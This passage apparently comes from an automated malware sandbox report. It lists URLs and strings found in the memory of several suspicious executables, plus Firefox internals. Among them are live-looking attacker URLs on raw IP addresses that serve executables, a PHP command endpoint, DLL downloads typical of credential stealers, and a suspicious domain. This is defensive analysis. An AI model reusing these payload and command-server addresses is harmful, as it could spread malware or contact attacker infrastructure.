"://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: vaniloin.fun
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube-nocookie.com

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: firefox.exe, 00000028.00000002.2900012409.000002619227D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exeM
Source: explorti.exe, 00000013.00000003.2924686960.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: ba77748b9b.exe, 00000016.00000002.2776962096.00000000027AE000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/-
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/1vfQ
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/4
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php7
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpKP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpS
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX4
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpY
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpg
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpq
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpyv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/7vhQ
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllUY
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllaY6C
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll&
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllk
Source: file.exe, 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/SSC:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/U
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Uv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/dows
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/gv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/sv
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31L
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000028.00000002.2917052824.00000261936E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919086701.0000026193AC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903918367.0000026192703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.00000261926FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2917052824.00000261936D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902396300.0000026192403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: PharmaciesDetection.exe, 00000015.00000000.2653080912.0000000000408000.00000002.00000001.01000000.00000010.sdmp, PharmaciesDetection.exe, 00000015.00000002.2680053271.0000000000408000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
